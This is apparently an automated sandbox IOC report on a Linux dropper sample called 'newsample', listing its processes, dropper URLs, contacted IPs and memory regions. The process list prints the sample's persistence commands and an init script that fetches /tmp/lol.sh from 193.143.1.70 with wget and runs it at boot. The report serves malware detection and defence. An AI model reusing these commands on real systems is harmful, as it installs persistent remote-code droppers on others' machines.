Automated Malware Analysis IOC Report for

Files

File Path

Type

Processes

Path

Cmdline

Malicious

/usr/bin/dash

/usr/bin/rm

rm -f /tmp/tmp.KGmKPPHcMf /tmp/tmp.6tfchMR5XJ /tmp/tmp.tFw6jbg2P6

/usr/bin/dash

/usr/bin/cat

cat /tmp/tmp.KGmKPPHcMf

/usr/bin/dash

/usr/bin/head

head -n 10

/usr/bin/dash

/usr/bin/tr

tr -d \\000-\\011\\013\\014\\016-\\037

/usr/bin/dash

/usr/bin/cut

cut -c -80

/usr/bin/dash

/usr/bin/cat

cat /tmp/tmp.KGmKPPHcMf

/usr/bin/dash

/usr/bin/head

head -n 10

/usr/bin/dash

/usr/bin/tr

tr -d \\000-\\011\\013\\014\\016-\\037

/usr/bin/dash

/usr/bin/cut

cut -c -80

/usr/bin/dash

/usr/bin/rm

rm -f /tmp/tmp.KGmKPPHcMf /tmp/tmp.6tfchMR5XJ /tmp/tmp.tFw6jbg2P6

/tmp/newsample

/bin/sh

sh -c "systemctl enable custom.service >/dev/null 2>&1"

/bin/sh

/usr/bin/systemctl

systemctl enable custom.service

/tmp/newsample

/bin/sh

sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"

/bin/sh

/usr/bin/chmod

chmod +x /etc/init.d/mybinary

/tmp/newsample

/bin/sh

sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"

/bin/sh

/usr/bin/ln

ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary

/tmp/newsample

/bin/sh

sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://193.143.1.70/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"

/tmp/newsample

/bin/sh

sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"

/bin/sh

/usr/bin/chmod

chmod +x /etc/init.d/sh

/tmp/newsample

/bin/sh

sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"

/bin/sh

/usr/bin/mkdir

mkdir -p /etc/rc.d

/tmp/newsample

/bin/sh

sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"

/bin/sh

/usr/bin/ln

ln -s /etc/init.d/sh /etc/rc.d/S99sh

/tmp/newsample

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/libexec/gnome-session-binary

/bin/sh

/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping

/usr/libexec/gsd-housekeeping

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/systemd/systemd

/usr/lib/systemd/system-environment-generators/snapd-env-generator

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

There are 58 hidden processes, click here to show them.

URLs

Name

Malicious

http://193.143.1.70/curl.sh

unknown

Details

Name:	http://193.143.1.70/curl.sh
TargetID:	32
From Memory:	true
Current Path:	/tmp/newsample
Source:	newsample

Signature Hits	Behavior Group	Mitre Attack
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

http://193.143.1.70/lol.sh

unknown

Details

Name:	http://193.143.1.70/lol.sh
TargetID:	32
From Memory:	true
Current Path:	/tmp/newsample
Source:	newsample

Signature Hits	Behavior Group	Mitre Attack
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

http://193.143.1.70/

unknown

Details

Name:	http://193.143.1.70/
TargetID:	-1
From Memory:	true
Source:	newsample, custom.service.32.dr, sh.58.dr, mybinary.32.dr, bootcmd.32.dr, inittab.32.dr, profile.32.dr

Signature Hits	Behavior Group	Mitre Attack
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior	Scripting
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

IPs

Domain

Country

Malicious

152.185.199.77

unknown

United States

223.253.184.139

unknown

Korea Republic of

164.202.209.137

unknown

United States

34.19.143.62

unknown

United States

119.138.255.18

unknown

China

180.35.209.103

unknown

Japan

154.101.102.83

unknown

Sudan

215.130.183.33

unknown

United States

5.236.182.131

unknown

Iran (ISLAMIC Republic Of)

154.148.133.157

unknown

Morocco

94.117.70.188

unknown

United Kingdom

90.65.173.120

unknown

France

213.235.50.149

unknown

United Kingdom

120.171.147.81

unknown

Indonesia

85.169.87.156

unknown

France

199.225.18.193

unknown

United States

20.210.129.227

unknown

United States

150.95.8.77

unknown

Japan

144.68.44.153

unknown

United States

3.130.88.199

unknown

United States

55.165.247.42

unknown

United States

211.127.6.115

unknown

Japan

191.144.172.119

unknown

Colombia

22.197.33.213

unknown

United States

94.221.110.100

unknown

Germany

56.22.8.176

unknown

United States

117.171.247.195

unknown

China

119.196.220.220

unknown

Korea Republic of

91.53.28.185

unknown

Germany

179.176.176.2

unknown

Brazil

169.57.96.44

unknown

United States

28.171.142.137

unknown

United States

5.154.251.104

unknown

Bosnia and Herzegowina

140.112.92.115

unknown

Taiwan; Republic of China (ROC)

143.145.38.253

unknown

United States

74.176.24.28

unknown

United States

69.157.113.93

unknown

Canada

44.20.251.177

unknown

United States

57.218.165.195

unknown

Belgium

203.134.152.137

unknown

Australia

18.65.9.143

unknown

United States

179.68.200.22

unknown

Brazil

94.35.212.79

unknown

Italy

150.82.235.196

unknown

Japan

102.138.138.72

unknown

Cote D'ivoire

177.66.61.120

unknown

Brazil

186.102.79.41

unknown

Colombia

96.26.148.92

unknown

United States

68.47.215.40

unknown

United States

110.18.232.150

unknown

China

69.18.88.225

unknown

United States

206.208.101.136

unknown

United States

93.165.142.202

unknown

Denmark

30.209.105.215

unknown

United States

182.252.12.251

unknown

Korea Republic of

110.147.110.39

unknown

Australia

196.155.62.154

unknown

Egypt

178.159.227.68

unknown

Ukraine

89.93.74.133

unknown

France

107.184.55.106

unknown

United States

160.191.154.80

unknown

154.143.192.224

unknown

Egypt

8.74.174.44

unknown

United States

157.0.52.5

unknown

China

97.229.42.18

unknown

United States

104.106.22.167

unknown

United States

16.212.33.24

unknown

United States

108.77.57.33

unknown

United States

139.185.147.136

unknown

United States

153.228.124.216

unknown

Japan

51.75.77.30

unknown

France

108.246.241.89

unknown

United States

96.138.193.5

unknown

United States

77.248.191.216

unknown

Netherlands

41.41.25.158

unknown

Egypt

159.73.68.124

unknown

Australia

152.246.39.188

unknown

Brazil

5.163.176.167

unknown

Saudi Arabia

192.102.49.74

unknown

Finland

70.18.20.73

unknown

United States

220.10.163.191

unknown

Japan

24.175.140.96

unknown

United States

220.245.170.61

unknown

Australia

174.205.7.155

unknown

United States

50.106.16.204

unknown

United States

98.5.16.226

unknown

United States

120.250.83.195

unknown

China

217.137.58.145

unknown

United Kingdom

96.247.133.7

unknown

United States

103.111.205.106

unknown

Indonesia

121.13.148.230

unknown

China

188.62.249.197

unknown

Switzerland

165.110.176.46

unknown

United States

54.101.96.96

unknown

United States

3.221.126.11

unknown

United States

187.177.161.126

unknown

Mexico

109.90.116.213

unknown

Germany

159.151.209.75

unknown

France

202.96.65.115

unknown

China

29.198.125.39

unknown

United States

There are 90 hidden IPs, click here to show them.

Memdumps

Base Address

Regiontype

Protect

Malicious

418000

page execute read

418000

page execute read

518000

page read and write

90d000

page read and write

7ffe39ba8000

page execute read

7ffe39a96000

page read and write

913000

page read and write

51b000

page read and write

518000

page read and write

7ffe39ba8000

page execute read

90d000

page read and write

51b000

page read and write

7ffe39a96000

page read and write

There are 3 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
newsample

Files

Processes

URLs

IPs

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Reportnewsample

Files

Processes

URLs

IPs

Memdumps

IOC Report
newsample